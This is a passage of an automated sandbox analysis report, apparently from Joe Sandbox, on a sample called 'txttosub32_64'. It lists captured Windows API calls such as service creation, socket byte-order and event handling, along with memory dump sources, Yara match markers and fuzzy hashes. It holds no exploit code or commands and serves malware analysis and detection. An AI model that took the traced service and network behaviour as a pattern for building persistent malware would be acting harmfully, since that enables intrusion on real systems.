                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02DA4DD6,?,?,?,00000001), ref: 02DA946D
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02DA9476
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: c59ea44c5f8d73f283ab77434d3a68c2e6233a7793f8f50bbaac1b0c71373a7c
                                                                                  • Instruction ID: 1a85377089bde8eafdc820777c17145334a28ff72aa244c2222d21660c86cc68
                                                                                  • Opcode Fuzzy Hash: c59ea44c5f8d73f283ab77434d3a68c2e6233a7793f8f50bbaac1b0c71373a7c
                                                                                  • Instruction Fuzzy Hash: 9FB0923248420CEBEB022B91EC1AB89BF38EB84662F104812F60D446908B6258209AA1
                                                                                  APIs
                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040B93A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CtrlDispatcherServiceStart
                                                                                  • String ID:
                                                                                  • API String ID: 3789849863-0
                                                                                  • Opcode ID: 90650e110da039b40fafa0fd6d4c90c93899d69b2f2a57bd7a811eef362d40d6
                                                                                  • Instruction ID: 6913f3b9d5896d80c06440323b1a33dbf0a22d3e41216f595afa5b2d61713e4e
                                                                                  • Opcode Fuzzy Hash: 90650e110da039b40fafa0fd6d4c90c93899d69b2f2a57bd7a811eef362d40d6
                                                                                  • Instruction Fuzzy Hash: 0AA022A008C280CAC88023028E0C838200CE30E30E330C033C00FB08F083BC800330BF
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateService
                                                                                  • String ID:
                                                                                  • API String ID: 1592570254-0
                                                                                  • Opcode ID: 18ebf8536bb4aad707ff79bcd0d8e044df14050751079ca806173349be0de06d
                                                                                  • Instruction ID: 09afc05e03b5d437ee7d7ce5c83ce1d7fd6f3d68a7fa816230484bfbc6d708ab
                                                                                  • Opcode Fuzzy Hash: 18ebf8536bb4aad707ff79bcd0d8e044df14050751079ca806173349be0de06d
                                                                                  • Instruction Fuzzy Hash: E19002301441029BC2504E206ADC018255152403453614435D607E84D0C6744599A949
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                  • Instruction ID: ebb4956d89cbbd7bb3be4cd118725a6b8d73e11289a3263bb3f3663c553d54d0
                                                                                  • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                  • Instruction Fuzzy Hash: DCF082B5A04309AED700DF95D942B9DFBB8EB85314F208169E508A7340E6B07E118B94
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D924E6
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02D924FC
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D9250E
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D9256D
                                                                                  • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 02D9257F
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 02D92599
                                                                                  • GetLastError.KERNEL32(?,74DEDFB0), ref: 02D925A2
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D925F0
                                                                                  • InterlockedDecrement.KERNEL32(00000002), ref: 02D9262F
                                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D9268E
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D92699
                                                                                  • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02D926AD
                                                                                  • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 02D926BD
                                                                                  • GetLastError.KERNEL32(?,74DEDFB0), ref: 02D926C7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                  • String ID:
                                                                                  • API String ID: 1213838671-0
                                                                                  • Opcode ID: 853b7a3c19b71e2f701627843f7a1045cbbe1e76d8200c4a7de8a944dc41fa40
                                                                                  • Instruction ID: 0a1e2c93eb232a3ed00c0272b0cdf9dac5d5a4540256688216d5232cbd847378
                                                                                  • Opcode Fuzzy Hash: 853b7a3c19b71e2f701627843f7a1045cbbe1e76d8200c4a7de8a944dc41fa40
                                                                                  • Instruction Fuzzy Hash: E1610971900209EFDB11DFA4D998AAEBBB9FF48314F10492AF956E3740D734AD54CB60
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D94608
                                                                                    • Part of subcall function 02DA3A8F: _malloc.LIBCMT ref: 02DA3AA7
                                                                                  • htons.WS2_32(?), ref: 02D94669
                                                                                  • htonl.WS2_32(?), ref: 02D9468C
                                                                                  • htonl.WS2_32(00000000), ref: 02D94693
                                                                                  • htons.WS2_32(00000000), ref: 02D94747
                                                                                  • _sprintf.LIBCMT ref: 02D9475D
                                                                                    • Part of subcall function 02D988BF: _memmove.LIBCMT ref: 02D988DF
                                                                                  • htons.WS2_32(?), ref: 02D946B0
                                                                                    • Part of subcall function 02D9966A: __EH_prolog.LIBCMT ref: 02D9966F
                                                                                    • Part of subcall function 02D9966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D996EA
                                                                                    • Part of subcall function 02D9966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D99708
                                                                                    • Part of subcall function 02D91BA7: __EH_prolog.LIBCMT ref: 02D91BAC
                                                                                    • Part of subcall function 02D91BA7: RtlEnterCriticalSection.NTDLL ref: 02D91BBC
                                                                                    • Part of subcall function 02D91BA7: RtlLeaveCriticalSection.NTDLL ref: 02D91BEA
                                                                                    • Part of subcall function 02D91BA7: RtlEnterCriticalSection.NTDLL ref: 02D91C13
                                                                                    • Part of subcall function 02D91BA7: RtlLeaveCriticalSection.NTDLL ref: 02D91C56
                                                                                    • Part of subcall function 02D9DE26: __EH_prolog.LIBCMT ref: 02D9DE2B
                                                                                  • htonl.WS2_32(?), ref: 02D9497C
                                                                                  • htonl.WS2_32(00000000), ref: 02D94983
                                                                                  • htonl.WS2_32(00000000), ref: 02D949C8
                                                                                  • htonl.WS2_32(00000000), ref: 02D949CF
                                                                                  • htons.WS2_32(?), ref: 02D949EF
                                                                                  • htons.WS2_32(?), ref: 02D949F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1645262487-0
                                                                                  • Opcode ID: ba48889673853affba7693d0efc5e51185cac5083ee0c41e8ac5b0e72c81c03a
                                                                                  • Instruction ID: cf55ebbf4a24b74b8d220621edcbe5437caaaafa496d37325c3783f1e1f9e60a
                                                                                  • Opcode Fuzzy Hash: ba48889673853affba7693d0efc5e51185cac5083ee0c41e8ac5b0e72c81c03a
                                                                                  • Instruction Fuzzy Hash: 6D023372C00259EFEF15DBA4C854BEEBBB9EF09304F10419AE505A7281DB745E89CFA1
                                                                                  APIs
                                                                                  • RtlDecodePointer.NTDLL(?), ref: 02DA827A
                                                                                  • _free.LIBCMT ref: 02DA8293
                                                                                    • Part of subcall function 02DA2EB4: HeapFree.KERNEL32(00000000,00000000,?,02DA5C12,00000000,00000104,74DF0A60), ref: 02DA2EC8
                                                                                    • Part of subcall function 02DA2EB4: GetLastError.KERNEL32(00000000,?,02DA5C12,00000000,00000104,74DF0A60), ref: 02DA2EDA
                                                                                  • _free.LIBCMT ref: 02DA82A6
                                                                                  • _free.LIBCMT ref: 02DA82C4
                                                                                  • _free.LIBCMT ref: 02DA82D6
                                                                                  • _free.LIBCMT ref: 02DA82E7
                                                                                  • _free.LIBCMT ref: 02DA82F2
                                                                                  • _free.LIBCMT ref: 02DA8316
                                                                                  • RtlEncodePointer.NTDLL(00A8E090), ref: 02DA831D
                                                                                  • _free.LIBCMT ref: 02DA8332
                                                                                  • _free.LIBCMT ref: 02DA8348
                                                                                  • _free.LIBCMT ref: 02DA8370
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 3064303923-0
                                                                                  • Opcode ID: 96d7a5a33a3c3989226050dc0e346476162758a63f6942b2739802b3cd325045
                                                                                  • Instruction ID: 574ee87a06c6b1e8a119d35aa990a63e26bd154884b74c6bac480725f2763d17
                                                                                  • Opcode Fuzzy Hash: 96d7a5a33a3c3989226050dc0e346476162758a63f6942b2739802b3cd325045
                                                                                  • Instruction Fuzzy Hash: 01217E32D41213DBDA256F16E864D1A77A9FB85770739882AEC04E7340C734DDA1EFA0
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035B9
                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035CD
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 004035F9
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403631
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402DE4), ref: 00403653
                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402DE4), ref: 0040366C
                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402DE4), ref: 0040367F
                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004036BD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                  • String ID: -@
                                                                                  • API String ID: 1823725401-2999422947
                                                                                  • Opcode ID: 1cc6be312ec1d8e66329dc6fd4efd164f8a72a1e96b14b97b62095cefe9ad85f
                                                                                  • Instruction ID: 0b04f6a2d221064569fc278bfa0bd0bc97edd3f654e45c3312801b4462726bcd
                                                                                  • Opcode Fuzzy Hash: 1cc6be312ec1d8e66329dc6fd4efd164f8a72a1e96b14b97b62095cefe9ad85f
                                                                                  • Instruction Fuzzy Hash: 0431F0B24042617EDB303F785C8883B7E9CE64574A7160D3BF542E3390E67A8E814AAD
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D93428
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02D9346B
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 02D93472
                                                                                  • GetLastError.KERNEL32 ref: 02D93486
                                                                                  • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D934D7
                                                                                  • RtlEnterCriticalSection.NTDLL(00000018), ref: 02D934ED
                                                                                  • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02D93518
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                  • String ID: CancelIoEx$KERNEL32
                                                                                  • API String ID: 2902213904-434325024
                                                                                  • Opcode ID: 302194693099c59dec29242bcbc625edac50b68e5a580ec5702ffc6d92c74c81
                                                                                  • Instruction ID: b56a18a805ee9f4a28af2285c6edbae96b3d68a7ce3b4e4f0716a9015a9e705e
                                                                                  • Opcode Fuzzy Hash: 302194693099c59dec29242bcbc625edac50b68e5a580ec5702ffc6d92c74c81
                                                                                  • Instruction Fuzzy Hash: 9D316B72A04205DFDB02AF68C854AAABBF9FF49311F1184AAF8169B340C770DD10CBA1
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403D7D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 0040541A
                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405432
                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405443
                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00405450
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                                  • API String ID: 2238633743-4073082454
                                                                                  • Opcode ID: 857fbd95a9621b190370f10c737466de674c3836a4dbc60644e0bc3c67934b46
                                                                                  • Instruction ID: 4aeab9cc9d8d5d83428a51e2c2b1d972da28487ac792a89a56faec8cf771f918
                                                                                  • Opcode Fuzzy Hash: 857fbd95a9621b190370f10c737466de674c3836a4dbc60644e0bc3c67934b46
                                                                                  • Instruction Fuzzy Hash: 0B018431740701AFC7209FB4AD84E6F7AE9EB44791305043BB945F22A1DB78C8A18F69
                                                                                  APIs
                                                                                  • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 00405917
                                                                                  • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405933
                                                                                  • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,004051A5,?,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 0040597C
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,004051A5,00200020,00000000,?,00000000,00000000), ref: 004059B4
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A0C
                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405A22
                                                                                  • LCMapStringW.KERNEL32(00000000,?,004051A5,00000000,004051A5,?,?,004051A5,00200020,00000000,?,00000000), ref: 00405A55
                                                                                  • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,004051A5,00200020,00000000,?,00000000), ref: 00405ABD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 352835431-0
                                                                                  • Opcode ID: 6907848f0787e9c5113033df9335a5e96f8f1f915b4ea5cfde5940b6be99cdad
                                                                                  • Instruction ID: f327038f2b5c9cc621bd4fa1c19b5a23ecf8fe31b88019e705ddafff0d6ab406
                                                                                  • Opcode Fuzzy Hash: 6907848f0787e9c5113033df9335a5e96f8f1f915b4ea5cfde5940b6be99cdad
                                                                                  • Instruction Fuzzy Hash: 95516C71A00609EFCF228FA5DD85A9F7FB5FB48750F14422AF911B21A0D3398921DF69
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403CC6
                                                                                  • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00403D9C
                                                                                  • WriteFile.KERNEL32(00000000), ref: 00403DA3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2984540971.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000002.00000002.2984540971.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_400000_txttosub32_64.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                  • API String ID: 3784150691-4022980321
                                                                                  • Opcode ID: 0ecb85853a73afdfdb7f445edddc3be8c88dc50627422a7add33a74104f98013
                                                                                  • Instruction ID: 5b8db87392af92a21e4635c1f5629febf61566e56fb7973cc4999cdcd376539e
                                                                                  • Opcode Fuzzy Hash: 0ecb85853a73afdfdb7f445edddc3be8c88dc50627422a7add33a74104f98013
                                                                                  • Instruction Fuzzy Hash: 3631B672A04208AFEF20EF60DE49FDA376CEF45305F1004BBF545F61C1D6B8AA558A59
                                                                                  APIs
                                                                                  • OpenEventA.KERNEL32(00100002,00000000,00000000,81815EB4), ref: 02DA15F0
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02DA1605
                                                                                  • ResetEvent.KERNEL32(00000000,81815EB4), ref: 02DA160F
                                                                                  • CloseHandle.KERNEL32(00000000,81815EB4), ref: 02DA1644
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,81815EB4), ref: 02DA16BA
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02DA16CF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$CreateOpenReset
                                                                                  • String ID:
                                                                                  • API String ID: 1285874450-0
                                                                                  • Opcode ID: e8779a8489a97cc8ff860c2c1a5ed0d449307f4a234e221a4871def684ce22d6
                                                                                  • Instruction ID: ac5e61e8a0d06fefc8b20f0e8e08c589fd2ac1e0b287fc0af159f2b7c91803ab
                                                                                  • Opcode Fuzzy Hash: e8779a8489a97cc8ff860c2c1a5ed0d449307f4a234e221a4871def684ce22d6
                                                                                  • Instruction Fuzzy Hash: 2F413B75D04359ABDF21CFA9D864BADBBB8EB05724F184219E819EB380D770DD05CBA0
                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D920AC
                                                                                  • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02D920CD
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D920D8
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 02D9213E
                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02D9217A
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 02D92187
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D921A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1171374749-0
                                                                                  • Opcode ID: 2cc825a4058f76d3b528a008d905d38e2c3505644ba39e7d7dc0fca0c5d74cc2
                                                                                  • Instruction ID: ea2fc09423dc9b383dee17a65f8465455dd363cc0cd279233bffe1e6e69faacf
                                                                                  • Opcode Fuzzy Hash: 2cc825a4058f76d3b528a008d905d38e2c3505644ba39e7d7dc0fca0c5d74cc2
                                                                                  • Instruction Fuzzy Hash: A2411972504701EFD721DF25D888A6BBBF9EFC8754F104A1EB89A92250D730E919CFA1
                                                                                  APIs
                                                                                    • Part of subcall function 02DA1E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02DA166E,?,?), ref: 02DA1E3F
                                                                                    • Part of subcall function 02DA1E10: CloseHandle.KERNEL32(00000000,?,?,02DA166E,?,?), ref: 02DA1E54
                                                                                    • Part of subcall function 02DA1E10: SetEvent.KERNEL32(00000000,02DA166E,?,?), ref: 02DA1E67
                                                                                  • OpenEventA.KERNEL32(00100002,00000000,00000000,81815EB4), ref: 02DA15F0
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02DA1605
                                                                                  • ResetEvent.KERNEL32(00000000,81815EB4), ref: 02DA160F
                                                                                  • CloseHandle.KERNEL32(00000000,81815EB4), ref: 02DA1644
                                                                                  • __CxxThrowException@8.LIBCMT ref: 02DA1675
                                                                                    • Part of subcall function 02DA449A: RaiseException.KERNEL32(?,?,02D9FA92,?,?,?,?,?,?,?,02D9FA92,?,02DC0F78,?), ref: 02DA44EF
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,81815EB4), ref: 02DA16BA
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02DA16CF
                                                                                    • Part of subcall function 02DA1B50: GetCurrentProcessId.KERNEL32(?), ref: 02DA1BA9
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,81815EB4), ref: 02DA16DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                  • String ID:
                                                                                  • API String ID: 2227236058-0
                                                                                  • Opcode ID: 8309ed7f781a5f5de744cbaa3366fb313a440c13c4ee403cc9f77d4dac58b76b
                                                                                  • Instruction ID: b0ac84c9b267e40daf3b67c74a3470abaeb20620ad50405ee19294938aa769cc
                                                                                  • Opcode Fuzzy Hash: 8309ed7f781a5f5de744cbaa3366fb313a440c13c4ee403cc9f77d4dac58b76b
                                                                                  • Instruction Fuzzy Hash: DF315A75D00359ABDF20CBA8D864FADB7B9AF05365F184219E81DEB380E760DD05CB61
                                                                                  APIs
                                                                                  • __init_pointers.LIBCMT ref: 02DA5CD4
                                                                                    • Part of subcall function 02DA8442: RtlEncodePointer.NTDLL(00000000), ref: 02DA8445
                                                                                    • Part of subcall function 02DA8442: __initp_misc_winsig.LIBCMT ref: 02DA8460
                                                                                    • Part of subcall function 02DA8442: GetModuleHandleW.KERNEL32(kernel32.dll,?,02DC1578,00000008,00000003,02DC0F5C,?,00000001), ref: 02DA91C1
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02DA91D5
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02DA91E8
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02DA91FB
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02DA920E
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02DA9221
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02DA9234
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02DA9247
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02DA925A
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02DA926D
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02DA9280
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02DA9293
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02DA92A6
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02DA92B9
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02DA92CC
                                                                                    • Part of subcall function 02DA8442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02DA92DF
                                                                                  • __mtinitlocks.LIBCMT ref: 02DA5CD9
                                                                                  • __mtterm.LIBCMT ref: 02DA5CE2
                                                                                    • Part of subcall function 02DA5D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02DA8878
                                                                                    • Part of subcall function 02DA5D4A: _free.LIBCMT ref: 02DA887F
                                                                                    • Part of subcall function 02DA5D4A: RtlDeleteCriticalSection.NTDLL(02DC3978), ref: 02DA88A1
                                                                                  • __calloc_crt.LIBCMT ref: 02DA5D07
                                                                                  • __initptd.LIBCMT ref: 02DA5D29
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02DA5D30
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_2d91000_txttosub32_64.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                  • String ID:
                                                                                  • API String ID: 3567560977-0
                                                                                  • Opcode ID: 8320bcfb206bf8dc06a1fd5f20176be62fc59fafab044471b46a57c9d16d7f4f
                                                                                  • Instruction ID: ef878515755e7a71ea93b350195bb41a934bbcd3b352493ed18022e8a43cba50
